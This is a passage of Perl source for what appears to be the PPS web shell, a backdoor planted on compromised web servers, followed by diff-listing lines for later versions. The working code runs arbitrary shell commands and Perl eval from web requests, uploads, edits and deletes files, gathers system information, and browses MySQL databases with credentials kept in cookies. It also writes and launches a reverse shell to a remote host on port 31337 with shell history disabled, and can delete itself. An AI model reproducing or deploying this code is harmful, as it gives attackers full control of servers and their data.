<table class=info id=toolsTbl cellpadding=0 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'><td><table cellpadding=3 cellspacing=3 width=50%><tr><td><form name="run" method="POST" action="$ScriptLocation"><input type="hidden" name="a" value="command"><input type="hidden" name="d" value="$CurrentDir"><input type=hidden name=c value=rename_file><input type=hidden name=path value=$path><input type=text size=20 name=rename_file value=$TransferFile><input type=submit value='RENAME'></form></td><tr><td><form name="run" method="POST" action="$ScriptLocation"><input type="hidden" name="a" value="command"><input type="hidden" name="d" value="$CurrentDir"><input type=hidden name=c value=touch_file><input type=hidden name=path value=$path><input type=text size=20 name=touch_file value="$Fdata"><input type=submit value='TOUCH '></form></td><tr><td><form name="run" method="POST" action="$ScriptLocation"><input type="hidden" name="a" value="command"><input type="hidden" name="d" value="$CurrentDir"><input type=text size=20 name=chmod value=$Fchmod><input type=hidden name=path value=$path><input type=hidden name=c value=chmod_file><input type=submit value='CHMOD '></form></td></tr><tr><td><form name="run" method="POST" action="$ScriptLocation"><input type="hidden" name="a" value="view_file"><input type="hidden" name="d" value="$CurrentDir"><input type=hidden name=path value=$TransferFile><input type=submit value='VIEW'></form></td></tr><tr><td><form name="run" method="POST" action="$ScriptLocation"><input type="hidden" name="a" value="edit_file_path"><input type="hidden" name="d" value="$CurrentDir"><input type=hidden name=path value=$TransferFile><input type=submit value='EDIT'></form></td></tr></table></td></table>
END
}
sub RT{&PrintPageHeader;print "<h1>File operations:</h1>";RTP();&PrintPageFooter;}
sub Console{&PrintPageHeader;print "<h1>Console:</h1>";P("". `$idd` . "");ConsoleP();&PrintPageFooter;}
sub CommandTimeout{if(!$WinNT){alarm(0);
print <<END;
</xmp>Command exceeded maximum time of $CommandTimeoutDuration second(s).<br>Killed it!
END
ConsoleP();exit;}}
sub file_header {
print <<END;
<h1>File manager</h1><table width=100% class=main cellspacing=0 cellpadding=0><tr><th width='13px'><input type=checkbox class=chkbx></th><th>Name</th><th>Size</th><th>Modify</th><th>Owner/Group</th><th>Permissions</th><th>Actions</th></tr>
END
}
sub ExecuteCommand1{if($RunCommand =~ m/^\s*cd\s+(.+)/){$CurrentDir=~s!\Q//!/!g;$OldDir=$CurrentDir;$Command="cd \"$CurrentDir\"".$CmdSep."cd $1".$CmdSep.$CmdPwd;chop($CurrentDir=`$Command`);&PrintPageHeader("c");print "<h1>Console:</h1>";print "<font size=2>";$Prompt = $WinNT ? "$OldDir> " : "[$ServerName $OldDir]\$ ";print "$Prompt $RunCommand";}else{&PrintPageHeader("c");print "<h1>Console:</h1>";print "<font size=2>";$Prompt = $WinNT ? "$CurrentDir> " : "[$ServerName $CurrentDir]\$ ";print "$Prompt $RunCommand<pre>";$Command = "cd \"$CurrentDir\"".$CmdSep.$RunCommand.$Redirector;if(!$WinNT){$SIG{'ALRM'}=\&CommandTimeout;alarm($CommandTimeoutDuration);}if($ShowDynamicOutput){$|=1;$Command .= " |";open(CommandOutput, $Command); while(<CommandOutput>){$_ =~ s/(\n|\r\n)$//;print "$_\n";}$|=0;}else{print `$Command`;}if(!$WinNT){alarm(0);}print "</pre>";}print "</font>";ConsoleP();&PrintPageFooter;}sub ExecuteCommand{my $path=$in{'path'};$CurrentDir=$in{'d'};$CurrentDir=~s!\Q//!/!g;
if($RunCommand eq "changedir"){$RunCommand="cd $ChangeDir";}elsif($RunCommand eq "makedir"){$RunCommand="mkdir $MkDir";}elsif($RunCommand eq "makefile"){$RunCommand="touch $MakeFile";}elsif($RunCommand eq "zip"){$RunCommand="tar cfz ".$ZipArch.".tar.gz ".$ZipFile;}elsif($RunCommand eq "unzip"){$RunCommand = "tar xfz ".$UnZipArch;}elsif($RunCommand eq "delfile"){$RunCommand="rm ".$DelFile;}elsif($RunCommand eq "deldir"){$RunCommand = "rm -rf ".$DelDir;}elsif($RunCommand eq "chmod_file"){my $tempt=$in{'chmod'};$RunCommand="chmod $tempt $path";}elsif($RunCommand eq "rename_file"){my $rtempt=$in{'rename_file'};$RunCommand="mv $path $CurrentDir/$rtempt";}elsif($RunCommand eq "touch_file"){my $ttempt=$in{'touch_file'};$ttempt=~s!\Q-!!g;$ttempt=~s!\Q:!!g;$ttempt=~s/ //g;my $ar=substr($ttempt,12);my $al=substr($ttempt,0,12);$ttempt=$al.".".$ar;$RunCommand = "touch -t $ttempt $path";}if($RunCommand =~ m/^\s*cd\s+(.+)/){$OldDir = $CurrentDir;$Command = "cd \"$CurrentDir\"".$CmdSep."cd $1".$CmdSep.$CmdPwd;chop($CurrentDir = `$Command`);&PrintPageHeader("c");file_header();print "<font size=1>";$Prompt = $WinNT ? "$OldDir> " : "[$ServerName $OldDir]\$ ";print "$Prompt $RunCommand";}else{&PrintPageHeader("c");file_header();print "<font size=1>";$Prompt = $WinNT ? 
"$CurrentDir> " : "[$ServerName $CurrentDir]\$ ";print "$Prompt $RunCommand<pre>";$Command = "cd \"$CurrentDir\"".$CmdSep.$RunCommand.$Redirector;if(!$WinNT){$SIG{'ALRM'} = \&CommandTimeout;alarm($CommandTimeoutDuration);}if($ShowDynamicOutput){$|=1;$Command .= " |";open(CommandOutput, $Command);while(<CommandOutput>){$_ =~ s/(\n|\r\n)$//;print "$_\n";}$|=0;}else{ print `$Command`;}if(!$WinNT){alarm(0);}print "</pre>";}print "</font>";&PrintCommandLineInputForm;&PrintPageFooter;}sub PrintDownloadLinkPage{local($FileUrl) = @_;if(-e $FileUrl){$FileUrl =~ s/([^a-zA-Z0-9])/'%'.unpack("H*",$1)/eg;$DownloadLink = "$ScriptLocation?a=download&f=$FileUrl&o=go";$HtmlMetaHeader = "<meta HTTP-EQUIV=\"Refresh\" CONTENT=\"1; URL=$DownloadLink\">";&PrintPageHeader("c");file_header();
print <<END;
<code><font size=1>Download File $TransferFile...</font><br></code>
END
&PrintCommandLineInputForm;&PrintPageFooter;}else{&PrintPageHeader("f");file_header();print "<code>Failed to download $FileUrl: $!</code>";&PrintFileDownloadForm;&PrintPageFooter;}}sub SendFileToBrowser{local($SendFile) = @_;if(open(SENDFILE, $SendFile)){if($WinNT){binmode(SENDFILE);binmode(STDOUT);}$FileSize = (stat($SendFile))[7];($Filename = $SendFile) =~ m!([^/^\\]*)$!;print "Content-Type: application/x-unknown\n";print "Content-Length: $FileSize\n";print "Content-Disposition: attachment; filename=$1\n\n";print while(<SENDFILE>);close(SENDFILE);}else{&PrintPageHeader("f");file_header();print "<code>Failed to download $SendFile: $!</code>";&PrintCommandLineInputForm;&PrintFileDownloadForm;&PrintPageFooter;}}sub BeginDownload{if(($WinNT & ($TransferFile =~ m/^\\|^.:/)) | (!$WinNT & ($TransferFile =~ m/^\//))){$TargetFile = $TransferFile;}else{chop($TargetFile) if($TargetFile = $CurrentDir) =~ m/[\\\/]$/;$TargetFile .= $PathSep.$TransferFile;}if($Options eq "go"){&SendFileToBrowser($TargetFile);}else{ &PrintDownloadLinkPage($TargetFile);}}sub SystemInfo{sub langs {$s = "which gcc;which perl;which python;which php;which tar;which zip";$s.=" -U $q{u}" if($q{u}); return $s;}sub hdd {$s = "df -h";$s.=" -U $q{u}" if($q{u});return $s;}sub perlv {$s = "perl -v";$s.=" -U $q{u}" if($q{u});return $s;}sub hosts {$s = "cat /etc/hosts";$s.=" -U $q{u}" if($q{u});return $s;}sub downloaders {$s = "which lynx;which links;which wget;which GET;which fetch;which curl";$s.=" -U $q{u}" if($q{u});return $s;}sub httpd {$s = "locate httpd.conf";$s.=" -U $q{u}" if($q{u});return $s;}$langs = langs();$httpd = httpd();$hdd = hdd();$perlv = perlv();$hosts = hosts();$downloaders = downloaders();&PrintPageHeader("c");print "<h1>System information</h1>";print '<font face="Verdana" size="1">';print "<b>Paths:</b>";P("<pre><font color='#E6DED8'>". `$langs`. "</font></pre>");print "<b>Downloaders:</b>";P("<pre><font color='#E6DED8'>". `$downloaders`. 
"</font></pre>");print "<b>httpd.conf:</b>";P("<pre><font color='#E6DED8'>". `$httpd`. "</font></pre>");print "<b>HDD:</b>";P("<pre><font color='#E6DED8'>". `$hdd`. "</font></pre>");print "<b>Perl version:</b>";P("<pre><font color='#E6DED8'>". `$perlv`. "</font></pre>");print "<b>/etc/hosts:</b>";P("<pre><font color='#E6DED8'>". `$hosts`. "</font></pre>");print '</font>';&PrintPageFooter;}sub sql_loginform{print "<h1>DataBases manager</h1>";&GetCookies;$hhost=$Cookies{'hhost'};$pport=$Cookies{'pport'};$usser=$Cookies{'usser'};$passs=$Cookies{'passs'};$dbb=$Cookies{'dbb'};if (!$hhost){$hhost='localhost'};if (!$pport){$pport='3306'};if (!$usser){$usser='root'};
print <<END;
<form name='sf' method='post' action="$ScriptLocation"><table cellpadding='2' cellspacing='0'><tr><td>Type</td><td>Host</td><td>Port</td><td>Login</td><td>Password</td><td>Database</td><td></td></tr><tr><td><select name='type' id='nname'><option value='mysql' selected>MySql</option><option value='pgsql' >PostgreSql</option></select></td><td><input type=text name=sql_host value=$hhost></td><td><input type=text name=sql_port value=$pport></td><td><input type=text name=sql_login value=$usser></td><td><input type=text name=sql_pass value=$passs></td><td><input type=text name=sql_db value=$dbb></td><input type="hidden" name="d" value="$CurrentDir"><input type="hidden" name="a" value="sql_connect"><td><input type=submit value='>>'></td></tr></table></form><br><script>document.getElementById('nname').focus();</script>
END
}
sub sql{use DBI;&PrintPageHeader("p");sql_loginform();sql_query_form();&PrintPageFooter;}sub sql_vars_set{$hhost=$in{'sql_host'};$pport=$in{'sql_port'};$usser=$in{'sql_login'};$passs=$in{'sql_pass'};$dbb=$in{'sql_db'};}sub sql_query_form{
print <<END;
<form name='querys' method='post' action="$ScriptLocation"><textarea name='query' style='width:100%;height:60px'></textarea><br/>
<input type=submit value='Query'> <input type="hidden" name="d" value="$CurrentDir"><input type="hidden" name="a" value="sql_query"></form>
END
}
sub sql_cq_form {
print <<END;
<table><td><span>Get data from columns:</span></td><td><form name='cquerys' method='post' action="$ScriptLocation"><textarea name='cquery' id='cquery' cols=40 style='width:100%;height:60px'></textarea><br/><input type="hidden" name="a" value="sql_query">
<input type="hidden" name="d" value="$CurrentDir"><input type=submit value='Query'></form></td></table>
END
}
sub sql_databases_form{print '<tr><form method=post name=dd'.$$ref[0].' action="'.$ScriptLocation.'">';print '<input type="hidden" name="a" value="sql_databases">';print "<input type=hidden name=database value=$$ref[0]>";print '<input type="hidden" name="d" value="'.$CurrentDir.'">';print '<td></font><font face="Verdana" size="1">['.$s4et.']</font></td><td><a href="javascript:document.dd'.$$ref[0].'.submit()"><font face="Verdana" size="1">'.' '.$$ref[0].'</font></a></td>';print "</form></tr>";}
sub sql_tables_form {print '<tr><form method=post name=tt'.$$ref[0].' action='.$ScriptLocation.'>';print '<input type="hidden" name="a" value="sql_tables">';print "<input type=hidden name=table value=$$ref[0]>";print '<input type="hidden" name="d" value="'.$CurrentDir.'">';print '<td></font><font face="Verdana" size="1">['.$s4et.']</font></td><td><a href="javascript:document.tt'.$$ref[0].'.submit()"><font face="Verdana" size="1">'.' '.$$ref[0].'</font></a></td>';print "</form></tr>";}
sub sql_columns_form{print '<script>function lol'.$s4et.'(f){if (f.checked){var cn=document.getElementById("cquery").value;if (cn!==""){document.cquerys.cquery.value=cn+","+f.id;}else{document.cquerys.cquery.value=f.id;}}else{exit;}}</script>';print '<tr><form method=post name=cc'.$$ref[0].' action='.$ScriptLocation.'>';print '<input type="hidden" name="a" value="sql_columns">';print '<input type=hidden name=column value='.$$ref[0].'>';print '<input type="hidden" name="d" value="'.$CurrentDir.'">';print '<td></font><font face="Verdana" size="1">['.$s4et.']</font></td><td><input type=checkbox id='.$$ref[0].' name=c'.$$ref[0].' onClick="lol'.$s4et.'(this.form.c'.$$ref[0].')"></td><td><a href="javascript:document.cc'.$$ref[0].'.submit()"><font face="Verdana" size="1">'.$$ref[0].'</font></a></td>';print "</form><tr>";}
sub sql_data_form {print '<tr><form method=post name=dt'.$$ref[0].' action='.$ScriptLocation.'>';print '<input type="hidden" name="d" value="'.$CurrentDir.'">';print "<td><font face='Verdana' size='1'>[$s4et] </font></td><td><font face='Verdana' size='1'>$$ref[0]</font></td>";print "</form></tr>";}
sub NetPrint{&PrintPageHeader("p");NetForm();&PrintPageFooter;}
sub NetForm {$rip = $ENV{'REMOTE_ADDR'};
print <<END;
<h1>Back-connect [perl]</h1><br/><form name='nfp' method=post action=$ScriptLocation>Server: <input type='text' name='server' value=$rip> Port: <input type='text' name='ppport' value=31337><input type="hidden" name="a" value="net_go"><input type=submit value='>>'></form><br>
END
}
sub back{open(FILE,">/tmp/bbc.pl");$bbc = '#!/usr/bin/perl
use IO::Socket;$system = "/bin/bash";use Socket;use FileHandle;socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname("tcp")) or die print "[-] Unable to Resolve Host\n";connect(SOCKET, sockaddr_in("'.$port.'", inet_aton("'.$target.'"))) or die print "[-] Unable to Connect Host\n";SOCKET->autoflush();open(STDIN, ">&SOCKET");open(STDOUT,">&SOCKET");open(STDERR,">&SOCKET");system("unset HISTFILE; unset SAVEHIST ;echo PPS 1.0 backconnect:;pwd;");system($system);';print FILE $bbc;close(FILE);system("chmod 777 /tmp/bbc.pl;perl /tmp/bbc.pl $target $port");exit;}
sub NetGo{&PrintPageHeader("c");$target = $in{'server'};$port = $in{'ppport'};NetForm();back();&PrintPageFooter;}
sub EvalCodePrint{&PrintPageHeader("p");EvalCodeForm();&PrintPageFooter;}
sub EvalCodeForm{
print <<END;
<h1>Execution PERL-code</h1><form name=pf method=post action=$ScriptLocation><textarea name=code class=bigarea id=PerlCode></textarea><input type="hidden" name="a" value="eval_code"><input type=submit value=Eval style="margin-top:5px">
END
}
sub EvalCode{&PrintPageHeader("c");EvalCodeForm();$ccode = $in{'code'};print "<br>Result:<br>";eval $ccode;&PrintPageFooter;}
sub EditFilePathForm {
print <<END;
<code><br><form name=pfsd method=post action=$ScriptLocation>$Prompt<input type="text" name=path id=edit1_file><input type="hidden" name="a" value="edit_file_path"><input type="hidden" name="d" value="$CurrentDir"><input type=submit value=MakeDir></form></code>
END
}
sub EditFilePath{$fpath = $in{'d'} . "/". $in{'path'};EditFilePrint();}
sub EditFilePrint{&PrintPageHeader("p");EditFileForm();&PrintPageFooter;}
sub EditFileForm{open(FILE, $fpath);@file = <FILE>;$fccodde = HtmlSpecialChars(join('', @file));
print <<END;
<h1>Edit File: $fpath</h1><form name=pf11 method=post action=$ScriptLocation><textarea name=ccode class=bigarea id=editfile>$fccodde</textarea><input type="hidden" name="a" value="edit_file"><input type=hidden name=path value=$fpath><input type="hidden" name="d" value="$CurrentDir"><input type=submit value=Save style="margin-top:5px"></form>
END
}
sub ViewFile{$fpath = $CurrentDir."/".$ViewF;&PrintPageHeader("c");open(FILE, $fpath);@file = <FILE>;$fccodde = join('', @file);
$fccodde = HtmlSpecialChars($fccodde);
print <<END;
<h1>View File: $fpath</h1><span>htmlspecialchars:</span><br><textarea name=view class=bigarea>$fccodde</textarea></form>
END
&PrintPageFooter;
}
sub EditFile {&PrintPageHeader("c");$fccode = $in{'ccode'};$ffpath = $in{'path'};
print <<END;
<h1>Edit File: $ffpath</h1><form name=pf11 method=post action=$ScriptLocation><textarea name=ccode class=bigarea id=editfile>$fccode</textarea><input type="hidden" name="a" value="edit_file"><niput type=hidden name=path value=$ffpath><input type="hidden" name="d" value="$CurrentDir"><input type=submit value=Save style="margin-top:5px"></form>
END
open(FFF,"> $ffpath");print FFF DeHtmlSpecialChars($fccode);close(FFF);print "File $ffpath saved";&PrintPageFooter;}
sub sql_columns{&GetCookies;$hhost=$Cookies{'hhost'};$pport=$Cookies{'pport'};$usser=$Cookies{'usser'};$passs=$Cookies{'passs'};
$dbb=$Cookies{'dbb'};$table=$Cookies{'table'};&PrintPageHeader("c");sql_vars_set();sql_loginform();$column=$in{'column'};
print <<END;
<SCRIPT LANGUAGE="JavaScript">function setCookie (name, value, expires, path, domain, secure){document.cookie=name+"="+escape(value)+((expires) ? "; expires=" + expires : "")+((path) ? "; path=" + path : "")+((domain) ? "; domain=" + domain : "")+ ((secure) ? "; secure" : "");}setCookie("column", "$column", "", "/");</SCRIPT>
END
print "<table width=100%>";print '<font face="Verdana" size="1">';$dbh = DBI->connect("DBI:mysql:$dbb:$hhost:$pport",$usser,$passs);$sth = $dbh->prepare("SHOW DATABASES");$sth->execute;print "<b>DATABASES:</b><br>";print "<td><table border=1 cellspacing=0 cellpadding=1>";while ($ref = $sth->fetchrow_arrayref){$s4et++;sql_databases_form();}$rc=$sth->finish;print "</table></td><td><table width=100%>";sql_query_form();print "</table></td></table>";$s4et = 0;$sth = $dbh->prepare("SHOW TABLES FROM $dbb");$sth->execute;print "</table>";print "<b>Tables from $dbb:</b><br>";print "<table border=1 cellspacing=0 cellpadding=1 cols=4>";print "<td><table border=1 cellspacing=0 cellpadding=1 cols=2>";while ($ref = $sth->fetchrow_arrayref){
$s4et++;sql_tables_form();}$rc=$sth->finish;print "</table></td><td><table border=1 cellspacing=0 cellpadding=1 cols=2>";$s4et=0;
$sth = $dbh->prepare("show columns from $table from $dbb");$sth->execute;while ($ref = $sth->fetchrow_arrayref){$s4et++; sql_columns_form();}$rc=$sth->finish;print "</table></td>";$s4et = 0;$zapros = "SELECT $column FROM `".$dbb."`.`".$table."` LIMIT 0,30";print '<script>document.querys.query.value="'.$zapros.'";</script>';$sth = $dbh->prepare($zapros);$sth->execute;print "<td><table border=1 cellspacing=0 cellpadding=1 cols=2>";while ($ref = $sth->fetchrow_arrayref){$s4et++;sql_data_form();}$rc = $sth->finish;$rc=$dbh->disconnect;print "</table></td></table>";&PrintPageFooter;}sub sql_tables{&GetCookies;$hhost=$Cookies{'hhost'};$pport=$Cookies{'pport'};$usser=$Cookies{'usser'};$passs=$Cookies{'passs'};$dbb=$Cookies{'dbb'};&PrintPageHeader("c");
sql_vars_set();sql_loginform();$qqquery = $in{'table'};
print <<END;
<SCRIPT LANGUAGE="JavaScript">function setCookie (name,value,expires,path,domain,secure){document.cookie=name+"="+escape(value)+((expires) ? ";expires="+expires:"")+((path) ? ";path="+path:"")+((domain) ? ";domain="+domain:"")+((secure) ? ";secure":"");}
setCookie("table", "$qqquery", "", "/");</SCRIPT>
END
print "<table width=100%>";print '<font face="Verdana" size="1">';$dbh = DBI->connect("DBI:mysql:$dbb:$hhost:$pport",$usser,$passs);$sth=$dbh->prepare("SHOW DATABASES");$sth->execute;print "<b>DATABASES:</b><br>";print "<td><table border=1 cellspacing=0 cellpadding=1>";while ($ref=$sth->fetchrow_arrayref){$s4et++;sql_databases_form();}$rc=$sth->finish;print "</table></td><td><table width=100%><td>";sql_cq_form();print "</td><td>";sql_query_form();print "</td></table></td></table>";$s4et=0;$sth=$dbh->prepare("SHOW TABLES FROM $dbb");$sth->execute;print "<b>Tables from $dbb:</b><br>";print "<table border=1 cellspacing=0 cellpadding=1 cols=4>";print "<td><table border=1 cellspacing=0 cellpadding=1 cols=2>";while ($ref = $sth->fetchrow_arrayref){$s4et++;sql_tables_form();}$rc=$sth->finish;print "</table></td><td><table border=1 cellspacing=0 cellpadding=1 cols=2>";$s4et=0;$zapros = "SHOW COLUMNS FROM `$qqquery` FROM `$dbb`";print '<script>document.querys.query.value="'.$zapros.'";</script>';$sth=$dbh->prepare($zapros);$sth->execute;while ($ref = $sth->fetchrow_arrayref){$s4et++;sql_columns_form();}$rc=$sth->finish;$rc=$dbh->disconnect;print "</table></td></table>";&PrintPageFooter;}
sub sql_databases{sql_vars_set();&PrintPageHeader("c");sql_vars_set();sql_loginform();$ddb = $in{'database'};
print <<END;
<SCRIPT LANGUAGE="JavaScript">function setCookie (name,value,expires,path,domain,secure){document.cookie = name+"="+escape(value) +((expires) ? ";expires="+expires:"")+((path) ? "; path="+path:"")+((domain) ? ";domain="+domain:"")+((secure) ? ";secure":"");}setCookie("dbb","$ddb","","/");</SCRIPT>
END
print "<table width=100%>";print '<font face="Verdana" size="1">';$dbh = DBI->connect("DBI:mysql:$dbb:$hhost:$pport",$usser,$passs);$sth = $dbh->prepare("SHOW DATABASES");$sth->execute;print "<b>DATABASES:</b><br>";print "<td><table border=1 cellspacing=0 cellpadding=1>";while ($ref=$sth->fetchrow_arrayref){$s4et++;sql_databases_form();}$rc=$sth->finish;print "</table></td><td><table width=100%>";sql_query_form();print "</table></td></table>";$s4et=0;$zapros = "SHOW TABLES FROM `$ddb`";print '<script>document.querys.query.value="'.$zapros.'";</script>';$sth=$dbh->prepare($zapros);$sth->execute;print "</table>";print "<b>Tables from $ddb:</b><br>";print " <table border=1 cellspacing=0 cellpadding=1 cols=10>";while ($ref=$sth->fetchrow_arrayref){$s4et++;sql_tables_form();}$s4et=0;$rc=$sth->finish;$rc=$dbh->disconnect;print "</table>";&PrintPageFooter;}
sub sql_set_cookie{print "Set-Cookie: hhost=$hhost;\n";print "Set-Cookie: pport=$pport;\n";print "Set-Cookie: usser=$usser;\n";print "Set-Cookie: passs=$passs;\n";print "Set-Cookie: dbb=$dbb;\n";}
sub sql_query{sql_vars_set();&GetCookies;$hhost=$Cookies{'hhost'};$pport=$Cookies{'pport'};$usser=$Cookies{'usser'};$passs=$Cookies{'passs'};$dbb=$Cookies{'dbb'};$table=$Cookies{'table'};&PrintPageHeader("c");sql_vars_set();sql_loginform();$qquery=$in{'cquery'};if ($qquery){$qquery="SELECT CONCAT_WS(0x3a,$qquery) FROM `$dbb`.`$table` LIMIT 0,30";}else{$qquery = $in{'query'};}$dbh = DBI->connect("DBI:mysql:$dbb:$hhost:$pport",$usser,$passs);$sth=$dbh->prepare("SHOW DATABASES");$sth->execute;print '<font face="Verdana" size="1">';print "<table width=100% cellspacing=0 cellpadding=1 cols=2>";print "<b>DATABASES:</b>";print "<td><table border=1 cellspacing=0 cellpadding=1>";while ($ref=$sth->fetchrow_arrayref){$s4et++;sql_databases_form();}$rc=$sth->finish;print "</table></td><td><table width=100%>";sql_query_form();print "</table></td></table>";$s4et=0;$sth = $dbh->prepare($qquery);$sth->execute;print "<b>Results:</b><br>";print " <table border=1 cellspacing=0 cellpadding=1 cols=10>";while ($ref=$sth->fetchrow_arrayref){$s4et++;print "<tr><td><font face=Verdana size=1>[$s4et]</font></td><td><font face=Verdana size=1>$$ref[0]</font></td></tr>";}$s4et=0;$rc=$sth->finish;$rc=$dbh->disconnect;print "</table>";print '<script>document.querys.query.value="'.$qquery.'";</script>';&PrintPageFooter;}
sub sql_connect{sql_vars_set();sql_set_cookie();&PrintPageHeader("c");sql_loginform();sql_vars_set();$s4et=0;$dbb="";$dbh=DBI->connect("DBI:mysql:$dbb:$hhost:$pport",$usser,$passs);if($hhost && $pport && $usser && $passs){$zapros = "SHOW DATABASES";print '<script>document.querys.query.value="'.$zapros.'";</script>';$sth = $dbh->prepare($zapros);$sth->execute;print '<font face="Verdana" size="1">';print "<table width=100%>";print "<b>DATABASES:</b>";print "<td><table border=1 cellspacing=0 cellpadding=1>";while($ref=$sth->fetchrow_arrayref){$s4et++;sql_databases_form();}$rc=$sth->finish;print "</table></td><td>"; sql_query_form();print "</td></table>";$rc = $dbh->disconnect;print '</font>';return;}print "Some error...";print '</font>';&PrintPageFooter;}
sub UploadFile{if($TransferFile eq ""){&PrintPageHeader("f");file_header();&PrintCommandLineInputForm;&PrintFileUploadForm;&PrintPageFooter;return;}&PrintPageHeader("c");file_header();print "<font size=1>Uploading $TransferFile to $CurrentDir...<br>";chop($TargetName) if ($TargetName = $CurrentDir) =~ m/[\\\/]$/;$TransferFile =~ m!([^/^\\]*)$!;$TargetName .= $PathSep.$1;$TargetFileSize = length($in{'filedata'});if(open(UPLOADFILE, ">$TargetName")){binmode(UPLOADFILE) if $WinNT;print UPLOADFILE $in{'filedata'};close(UPLOADFILE);print "Transfered $TargetFileSize Bytes.<br>";print "File Path: $TargetName<br>";}else{print "Failed: $!<br>";}print "</font>";&PrintCommandLineInputForm;&PrintPageFooter;}
sub DownloadFile{if(($WinNT & ($TransferFile =~ m/^\\|^.:/)) | (!$WinNT & ($TransferFile =~ m/^\//))){$TargetFile=$TransferFile;
}else{chop($TargetFile) if($TargetFile = $CurrentDir) =~ m/[\\\/]$/;$TargetFile .= $PathSep.$TransferFile;}if($Options eq "go"){
&SendFileToBrowser($TargetFile);}else{&PrintDownloadLinkPage($TargetFile);}}
sub Remove{use Cwd qw(abs_path);my $path = abs_path($0);system("rm $path");}
&ReadParse;&GetCookies;$ScriptLocation=$ENV{'SCRIPT_NAME'};$ServerName=$ENV{'SERVER_NAME'};$LoginPassword=$in{'p'};$RunCommand=$in{'c'};$RunCommand1=$in{'aliases'};if($RunCommand1){$RunCommand=$RunCommand1}$ChangeDir=$in{'cc'};$ZipFile=$in{'zip'};$ZipArch=$in{'arh_name'};$UnZipArch=$in{'unzip_name'};$DelFile=$in{'del_file'};$DelDir=$in{'del_dir'};$MkDir=$in{'md'};$ViewF=$in{'path'};$Fchmod=$in{'fchmod'};$Fdata=$in{'fdata'};$MakeFile=$in{'mf'};$TransferFile=$in{'f'};$Options=$in{'o'};$Action=$in{'a'};$Action="filemanager" if($Action eq "");$CurrentDir=$in{'d'};chop($CurrentDir=`$CmdPwd`) if($CurrentDir eq "");$LoggedIn=$Cookies{'SAVEDPWD'} eq $Password;if($Action eq "login" || !$LoggedIn){&PerformLogin;}elsif($Action eq "command"){&ExecuteCommand;}elsif($Action eq "RT"){&RT;}elsif($Action eq "view_file"){&ViewFile;}elsif($Action eq "command1"){&ExecuteCommand1;}elsif($Action eq "filemanager"){&FileManager;}elsif($Action eq "console"){&Console;}elsif($Action eq "upload"){&UploadFile;}elsif($Action eq "download"){&DownloadFile;}elsif($Action eq "systeminfo"){&SystemInfo;}elsif($Action eq "code"){&EvalCodePrint;}elsif($Action eq "eval_code"){&EvalCode;}elsif($Action eq "net"){&NetPrint;}elsif($Action eq "net_go"){&NetGo;}elsif($Action eq "sql"){&sql;}elsif($Action eq "sql_connect"){&sql_connect;}elsif($Action eq "sql_query"){&sql_query;}elsif($Action eq "remove"){&Remove;}elsif($Action eq "edit_file"){&EditFile;}elsif($Action eq "edit_file_path"){&EditFilePath;}elsif($Action eq "sql_databases"){&sql_databases;}elsif($Action eq "sql_tables"){&sql_tables;}elsif($Action eq "sql_columns"){&sql_columns;}elsif($Action eq "logout"){&PerformLogout;}

78
pl/pps-pl/pps-v3.0.pl Normal file

File diff suppressed because one or more lines are too long

79
pl/pps-pl/pps-v3.5.pl Normal file

File diff suppressed because one or more lines are too long

82
pl/pps-pl/pps-v4.0.pl Normal file

File diff suppressed because one or more lines are too long